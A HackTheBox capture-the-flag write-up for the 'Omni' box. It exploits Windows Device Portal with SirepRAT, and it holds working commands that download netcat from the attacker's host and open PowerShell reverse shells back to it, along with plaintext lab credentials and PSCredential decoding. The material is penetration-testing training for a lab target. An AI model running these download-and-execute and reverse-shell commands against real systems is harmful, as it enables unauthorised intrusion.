Omni – HackTheBox Writeup
IP: 10.10.10.204
Difficulty: Easy
Summary: Omni is a Windows Box that is pwned using Windows Device Portal exploit. Post-exploitation, enumeration of files leads to discovery of PSCredential Object and decoding it to gain root flag.
Information Gathering
Performing a NMAP scan to enumerate ports and services running on the target, we use the following command:
nmap -sC -sV -oN omni.nmap 10.10.10.204
Ports 135 and 8080 are open.
Enumeration
Port 8080 is being used by Windows’ Device Portal. Skimming through Microsoft’s Documentation for Windows Device Portal, we can infer that it is an IoT device with Dev mode enabled, running Windows OS.
Visiting “10.10.10.204:8080” on the browser, login box is prompted.
The default credentials, “Administrator : p@ssw0rd” do not work.
Googling for “Windows Device Portal exploit”, the first result was “SafeBreach-Labs/SirepRAT” git repo. This tool exploits Sirep/WPCon protocol to get RCE.
Let’s clone tool and try it!
git clone https://github.com/SafeBreach-Labs/SirepRAT.git cd SirepRAT pip install -r requirements.txt
Testing the tool:
python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\hostname.exe"
The command returns hostname as omni and some junk. We can confirm the exploit works for this box.
Exploitation
Let’s get a shell by uploading netcat and running it to get a reverse shell.
Start a python server on port 8000 to host netcat:
python3 -m http.server
Upload a netcat (nc64.exe) to a directory on target:
python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args " /c powershell iwr -uri http://10.10.15.206:8000/nc64.exe -outfile C:\\Windows\\System32\\spool\\drivers\\color\\hnc64.exe" --v
Listen on netcat to get a shell:
nc -lvnp 1234
Run netcat on omni to get a reverse shell:
python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput –return_output –cmd “C:\Windows\System32\cmd.exe” –args ” /c C:\\Windows\\System32\\spool\\drivers\\color\\hnc64.exe 10.10.15.206 1234 -e powershell” –v
We get a powershell call back from the above command.
There was no user.txt flag found at the usual location. Checking “C:\Users\” directory, there weren’t any users’ home directories listed. This is unusual.
To find user.txt:
get-childitem -path C:\ -filter user.txt -recurse
The user.txt file exists in the “C:\Data\Users\app” directory. Let’s look at it’s contents:
type "C:\Data\Users\app\user.txt"
Similarly, we can find root.txt. The contents of root.txt were also readable.
get-childitem -path C:\ -filter root.txt -recurse type C:\Data\Users\administrator\root.txt
The contents of the files aren’t in the usual flag format. The file is in XML format with powershell as it’s schema. They are probably a PSCredential class encoded objects.
Reading a blog on how to decode this PSCredential Object, we can try to decode it:
$credential = Import-CliXml -Path C:\Data\Users\app\user.txt
We get a security error. We need to execute the command as that particular user to be able to decode it. We need to dig deeper to get a shell as “app”.
Enumerating further, a hidden file called “r.bat” was found in “C:\Program Files\WindowPowerShell\Modules\PackageManagement”.
cd "C:\Program Files\WindowPowerShell\Modules\PackageManagement" ls -force type r.bat
From the contents of the file, we find credentials of app and administrator in plaintext. We can try using these credentials in the login portal on port 8080.
The credentials work. After logging in, we find “Run Command” tab under Processes where we can run commands as the user logged in.
Getting a reverse shell as “app”:
Listen on a port:
nc -lvnp 1212
Get reverse shell by running netcat as “app” by logging in with credential: “app:mesh5143“
Decode the PSCredential object:
$credential = Import-CliXml -Path C:\Data\Users\app\user.txt $credential.GetNetworkCredential().Password
Pwned user!
Similarly, for root, login as “administrator:_1nt3rn37ofTh1nGz”, get the reverse shell as administrator and decode!
Pwned root!
